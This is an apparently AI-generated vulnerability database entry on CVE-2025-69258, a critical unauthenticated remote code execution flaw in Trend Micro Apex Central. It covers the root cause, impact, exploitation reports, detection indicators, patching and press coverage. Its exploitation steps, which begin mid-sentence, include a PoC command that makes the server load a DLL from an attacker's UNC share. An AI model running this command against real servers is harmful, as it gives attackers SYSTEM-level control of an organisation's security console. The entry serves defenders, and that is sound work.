
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-69258 is a critical LoadLibraryEx remote code execution (RCE) vulnerability in Trend Micro Apex Central (on-premise) that allows an unauthenticated remote attacker to load an attacker-controlled DLL into a key executable (MsgReceiver.exe), resulting in arbitrary code execution under the SYSTEM context. The vulnerability affects all Apex Central 2019 builds prior to Build 7190 running on Windows. It was discovered by Tenable and disclosed on January 8, 2026, following a coordinated disclosure process that began in August 2025. The CVSS v3.1 base score is 9.8 (Critical) (Trend Micro Advisory, Tenable Advisory).
The vulnerability resides in MsgReceiver.exe, which listens on TCP port 20001 and processes custom binary messages. Message type 0x0a8d (SC_INSTALL_HANDLER_REQUEST) includes an attacker-controlled DLL name that is passed directly to LoadLibraryExA() in msgHandlerLogReceiver.dll without validation, allowing an attacker to specify a UNC path (e.g., \\attacker-share\evil.dll) to a remotely hosted malicious DLL. The root causes are classified as CWE-120 (Buffer Copy without Checking Size of Input), CWE-290 (Authentication Bypass by Spoofing), and CWE-346 (Origin Validation Error) — no authentication is required to send the triggering message. Tenable published a detailed technical advisory including message structure definitions and a Python-based PoC exploit script (Tenable Advisory).
Successful exploitation grants an unauthenticated remote attacker SYSTEM-level code execution on the Apex Central server, resulting in complete confidentiality, integrity, and availability compromise of the affected host. Because Apex Central is a centralized security management console that manages endpoints across an organization, a compromised instance could enable an attacker to access all managed endpoints, exfiltrate sensitive security telemetry and policy data, deploy malware organization-wide, and move laterally throughout the network (Trend Micro Advisory, Tenable Advisory).
A public proof-of-concept exploit (Python script) was released by Tenable alongside their advisory on January 8, 2026, and exploitation has been reported by multiple sources including SecurityWeek and Taiwan's Ministry of Digital Affairs (MODA) (Tenable Advisory, SecurityWeek, MODA Report). The vulnerability requires no authentication, no user interaction, and is exploitable over the network, making it trivially weaponizable. The EPSS score is approximately 0.002 (0.2%), though the critical CVSS score and public PoC availability significantly elevate real-world risk. As of the available data, the vulnerability has not been added to the CISA KEV catalog, and no specific threat actor attribution has been publicly confirmed.
\\attacker-ip\share\evil.dll).0x0a8d (SC_INSTALL_HANDLER_REQUEST) targeting MsgReceiver.exe on TCP port 20001. The message body includes the UNC path to the attacker-controlled DLL as the handler field, with the flag field set to 1 (install handler).python3 tm_apex_central_MsgReceiver_LoadLibrary_rce.py -t <target> -p 20001 -d '\\\\<attacker-ip>\\share\\evil.dll'MsgReceiver.exe calls LoadLibraryExA() with the attacker-supplied UNC path, loading the malicious DLL into the process running as SYSTEM, executing the attacker's payload with full system privileges (Tenable Advisory).MsgReceiver.exe (e.g., cmd.exe, powershell.exe, net.exe); unexpected DLLs loaded into the MsgReceiver.exe process address space from UNC or non-standard paths.MsgReceiver.exe loading DLLs from network paths (Event ID 7045 for new services, or Sysmon Event ID 7 for image loads); Apex Central application logs showing unusual message handler registration activity on port 20001.Trend Micro has released Critical Patch Build 7190 for Apex Central 2019 (on-premise), which resolves CVE-2025-69258 along with related vulnerabilities CVE-2025-69259 and CVE-2025-69260. All customers running Apex Central builds prior to 7190 on Windows should upgrade immediately (Trend Micro Advisory). As a temporary workaround where immediate patching is not possible, implement network segmentation to restrict access to TCP port 20001 on the Apex Central server to only trusted internal hosts, and block outbound SMB traffic from the server to prevent DLL retrieval from attacker-controlled shares. Trend Micro also advises reviewing remote access policies and ensuring perimeter security controls are current.
The vulnerability received significant media coverage, with SecurityWeek, The Hacker News, Help Net Security, and multiple security blogs reporting on the critical flaw and the availability of a public PoC shortly after disclosure (SecurityWeek, The Hacker News). Heise.de noted that Trend Micro took over four months to release a security patch after Tenable's initial disclosure in August 2025, highlighting concerns about vendor responsiveness (Heise). Security researchers and community members on Mastodon, Reddit, and Bluesky flagged the vulnerability as a top trending CVE in early January 2026, emphasizing the risk posed by a SYSTEM-level RCE in a security management platform. Arctic Wolf and Field Effect also published customer-facing advisories urging immediate patching.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."